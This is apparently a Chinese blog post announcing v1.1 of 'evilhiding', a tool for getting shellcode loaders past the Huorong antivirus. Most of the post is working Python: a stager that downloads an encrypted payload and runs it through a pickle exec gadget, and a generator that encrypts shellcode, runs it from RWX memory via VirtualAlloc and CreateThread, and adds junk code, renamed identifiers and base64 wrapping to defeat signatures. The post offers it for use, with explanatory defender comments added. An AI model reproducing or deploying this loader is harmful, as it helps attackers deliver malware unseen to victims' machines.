记一次有趣的免杀探索


前记

evilhiding昨天被提issue不能绕过火绒了,于是今天更新了evilhiding v1.1,已经可以继续免杀了。

期待各位的stars,项目地址如下:

https://github.com/coleak2021/evilhiding

查杀排查

直接python运行b.py发现未被查杀,且可正常上线,但是通过pyinstaller打包为exe后发现被火绒查杀,因此打算对源代码进行修改来绕过火绒

于是对b.py关键部分分别打包检查,发现均未被查杀

加载器

import pickle,base64,requests,ctypes
from cryptography.fernet import Fernet

# Remote URL the loader fetches the Fernet-encrypted payload from; left blank in the published listing.
url=''
# Decrypt a Fernet token containing Python source and run it through a pickle
# deserialisation gadget. This is the textbook "pickle.loads executes attacker
# code" pattern: A.__reduce__ returns (exec, (destr,)), so reconstructing the
# object on load calls exec() on the decrypted text. The base64 encode/decode
# pair below is a round-trip of the same bytes and does not change what
# pickle.loads receives. Mitigation for any consumer: never unpickle data you
# did not produce yourself; a restricted Unpickler.find_class is the minimum bar.
def O7867890(sectr):
    # Hard-coded symmetric key: anyone holding the binary can decrypt the payload.
    KEY=b'Lo8QurfIObo62aKQsQjnzAocsnrrIkTsJewRJLLKAsA='
    fernet = Fernet(KEY)
    # Fernet.decrypt raises InvalidToken on a wrong key or tampered token; not handled here.
    destr = fernet.decrypt(sectr).decode()
    class A(object):
        def __reduce__(self):
            # unpickling rebuilds A() as exec(destr) -> arbitrary code execution on load
            return (exec, (destr,))

    ret = pickle.dumps(A())
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

执行器

# Fetch the encrypted payload from the module-level `url` and hand the response
# body to O7867890. Any exception from requests.get (network failure, invalid
# URL - `url` is '' in the listing) is swallowed and treated as a 404, so an
# unreachable server makes the program exit silently. Defender note: an
# HTTP GET whose body is immediately decrypted and exec()ed is classic stager
# behaviour; egress logging of python/pyinstaller processes is the place to see it.
def O1674418():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        # bare except: also traps KeyboardInterrupt/SystemExit; `pass` after the
        # assignment is dead code
        a = 404
        pass

    if a == 200:
        # r.text is the Fernet token as str; O7867890 decrypts and exec()s it
        O7867890(r.text)
    else:
        pass

if __name__ == '__main__':
    # t1 and t2 are the source strings shown in the next listing; exec()ing
    # them sorts a list of random floats and base64-round-trips a fixed string.
    # Neither result is used by O1674418, which performs the fetch-decrypt-exec.
    exec(t1)
    exec(t2)
    O1674418()

花指令

# Source string run via exec() from __main__: base64-encodes and then decodes a
# fixed ASCII sentence and binds aaa/bbb in the executing namespace. Nothing in
# the listing reads those names afterwards; the block has no effect on the loader.
t2 ="""
import base64

st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
   """

# Source string run via exec() from __main__: defines a Lomuto-partition
# quicksort (O4402217 = partition, O7313740 = recursive driver) and sorts
# 59999 random floats in place. The sorted list is never read. With random
# input the recursion depth stays far below the default recursion limit in
# practice; a pre-sorted input would not, but none is supplied here.
t1 ="""
import random

def O4402217(test_arr, low, high):
   i = (low - 1)  
   pivot = test_arr[high]

   for j in range(low, high):
       if test_arr[j] <= pivot:
           i = i + 1
           test_arr[i], test_arr[j] = test_arr[j], test_arr[i]

   test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1]
   return i + 1


def O7313740(test_arr, low, high):
   if low < high:
       pi = O4402217(test_arr, low, high)
       O7313740(test_arr, low, pi - 1)
       O7313740(test_arr, pi + 1, high)


test_arr= []
for i in range(59999):
   test_arr.append(random.random())
n= len(test_arr)
O7313740(test_arr,0, n - 1)
   """

得出结论:各部分可以分别正常打包,但是火绒对整体进行了特征提取,因此我们只需要将文件结构做修改即可

源码修改

经过测试,最终对b.py修改为如下,此时打包为exe可绕过火绒正常上线

from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random

# Remote URL the loader fetches the Fernet-encrypted payload from; blank in the published listing.
url=''
# Second revision of the loader entry: the same decrypt-then-pickle gadget as
# before, plus a say_hello() call that exec()s the module-level string bbb
# (a base64 round-trip of a fixed string). exec() is called without explicit
# namespaces, so the `bbb=` assignment inside that string lands in the
# method's local snapshot and does not rebind the module-level bbb.
def O7867890(sectr):
    # KEY is blank in the published listing; Fernet() rejects a malformed key,
    # so this snippet only runs once the generator below has filled it in.
    KEY=b''
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    class A(object):
        def __reduce__(self):
            # unpickling rebuilds A() as exec(destr) -> arbitrary code execution on load
            return (exec, (destr,))
        def say_hello(self):
            exec(bbb)
    a=A()
    a.say_hello()
    ret = pickle.dumps(a)
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

# Source string exec()ed by A.say_hello above: base64 round-trip of a fixed
# ASCII string. Its assignments have no effect outside the exec() call.
bbb ="""
import base64
st= 'cccccccccccccccccccooooooooooollllllllllllleeeeeeeeeeeeaaaaaaaaaaaakkkkkkkkk'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
   """

# Fetch the encrypted payload from `url` and pass the body to O7867890.
# Identical to the first listing: every exception from requests.get is mapped
# to 404 and the program then exits silently; a 200 leads straight to
# decrypt-and-exec of the response text.
def O1674418():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        # bare except; the trailing `pass` is dead code after the assignment
        a = 404
        pass

    if a == 200:
        O7867890(r.text)
    else:
        pass

if __name__ == '__main__':
    # single entry point: fetch, decrypt, exec
    O1674418()

因此,对main.py生成器修改如下

# -*- coding: utf-8 -*-

import base64
import re,os,time
from cryptography.fernet import Fernet

# Build-time inputs. `shellcode` and `url` are blank placeholders in the
# published listing. Two independent Fernet keys are generated per build:
# `key` encrypts the raw shellcode (embedded in the stage-2 text `a` below),
# `key2` encrypts that whole stage-2 text (written to a.txt) and is embedded
# in the stage-1 template `cccc` so the generated b.py can decrypt it.
shellcode = b""
url=''
key = Fernet.generate_key()
fernet = Fernet(key)
enstr = fernet.encrypt(shellcode)
key2 = Fernet.generate_key()
fernet2 = Fernet(key2)
# Stage-2 template (Windows only, via ctypes.windll). {key} and {enstr} are
# interpolated as bytes literals (b'...'), so the generated text is valid
# Python. When executed it decrypts the shellcode in memory and runs it:
#   - VirtualAlloc(NULL, len, 0x3000, 0x40): 0x3000 = MEM_COMMIT|MEM_RESERVE,
#     0x40 = PAGE_EXECUTE_READWRITE, i.e. one RWX region.
#   - RtlMoveMemory copies the decrypted bytes into that region.
#   - CreateThread starts a thread at the region's base address;
#     WaitForSingleObject(handle, -1) blocks indefinitely (INFINITE).
# Detection/mitigation: an RWX allocation followed by a thread whose start
# address lies inside it, from a python/pyinstaller process, is the
# behavioural pattern EDR memory-scan rules key on, and it is exactly what
# dynamic-code policies such as Arbitrary Code Guard block.
a=f'''
import ctypes
from cryptography.fernet import Fernet
KEY={key}
fernet=Fernet(KEY)
shellcode=fernet.decrypt({enstr})

shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
'''

# Stage-1 template: the text that, after the renaming pass and base64
# wrapping below, ends up inside b.py. Build-time interpolation: {url} and
# {key2}. Because the template itself is an f-string, the inner `url=f'{url}'`
# is resolved here, not in the generated file. At run time the generated code
# fetches a Fernet token from url, decrypts it with key2 (the key a.txt is
# encrypted with) and exec()s the result through the pickle __reduce__ gadget
# in aaa(). class B, bbb and O6294286 only append to a list 100 times and do
# not take part in the payload path.
cccc=f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
url=f'{url}'
a=[]
class B():
    def cc(self):
        for i in range(5):
            a.append(i)

def O7303771(sectr):
    global destr
    KEY={key2}
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    aaa(destr)

def aaa(destr):
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))
        def O6294286(self):
            exec(bbb)
    a=A()
    a.O6294286()
    ret = pickle.dumps(a)
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

bbb ="""
for i in range(100):
    aaa=B()
    aaa.cc()
   """

def O0135984():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7303771(r.text)
    else:
        pass
if __name__ == '__main__':
    O0135984()
'''

def hunxiao():
    """Rename function identifiers in content.txt and write the result to b.py.

    Collects every ``def <name>(`` with a regex, is meant to drop dunder names
    and ``super``, maps each remaining name to ``'O' + last 7 chars of
    str(hash(name))`` and text-replaces the occurrences it knows about
    (``name(``, ``target=name``, ``global name``, ``, name``). If two names
    collide it prints 'hash repeat' and writes the text unchanged.
    ``hash()`` on a str is randomised per interpreter process unless
    PYTHONHASHSEED is set, so the generated identifiers differ on every run.
    Reads and writes relative to the current working directory.
    """
    openfile = 'content.txt'
    # file object is never closed explicitly
    text = open(openfile, encoding='utf-8').read()
    wd_df = re.findall("def (.*?)\\(", text)
    wd_df = list(set(wd_df))
    for i in wd_df:
        if i[0:2] == "__":
            wd_df.remove(i)
        if i == 'super':
            wd_df.remove(i)
    idlist = []
    for i in wd_df:
        idlist.append('O' + str(hash(i))[-7:])

    cs = len(wd_df)
    if cs == len(set(idlist)):
        while cs > 0:
            cs -= 1
            # plain substring replacement, not token-aware
            text = text.replace(wd_df[cs] + '(', idlist[cs] + '(')
            text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs])
            text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs])
            text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs])
    else:
        print('hash repeat')

    file_save = open('b.py', 'w', encoding='utf-8')
    file_save.write(text)
    file_save.close()

# Write the stage-1 template to content.txt and run the renamer while the
# file handle is still open inside the with-block.
with open('content.txt', 'bw') as f:
    f.write(cccc.encode())
    hunxiao()

# a.txt = Fernet(key2)-encrypted stage-2 text; this is the blob the generated
# b.py expects to receive from `url`.
with open('a.txt', 'bw') as f:
    f.write(fernet2.encrypt(a.encode()))

# Re-read content.txt (after the handle above was closed) and base64 it for
# embedding into the final b.py.
with open('content.txt', 'br') as f:
    content=base64.b64encode(f.read())

# Final b.py: embeds base64(content) as a bytes literal and exec()s the
# decoded text at import time. Overwrites whatever b.py hunxiao() produced.
b = f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
cccc={content}
exec(base64.b64decode(cccc).decode())
'''

with open('b.py', 'w', encoding='utf-8') as f:
    f.write(b)

# Copy coleak.ico to a timestamp-named .ico, appending the new file name to
# the icon bytes before writing. Then read create.py and exec() its contents;
# create.py is not shown on the page - presumably the pyinstaller packaging
# step mentioned in the article, TODO confirm.
iconame=f'{int (time.time() *1000)}.ico'
with open('coleak.ico',"br") as f:
    cont=f.read()
with open(f'{iconame}',"bw") as f:
    cont+=iconame.encode()
    f.write(cont)
with open('create.py',"br") as f:
    createit=f.read()
exec(createit)

免杀效果测试

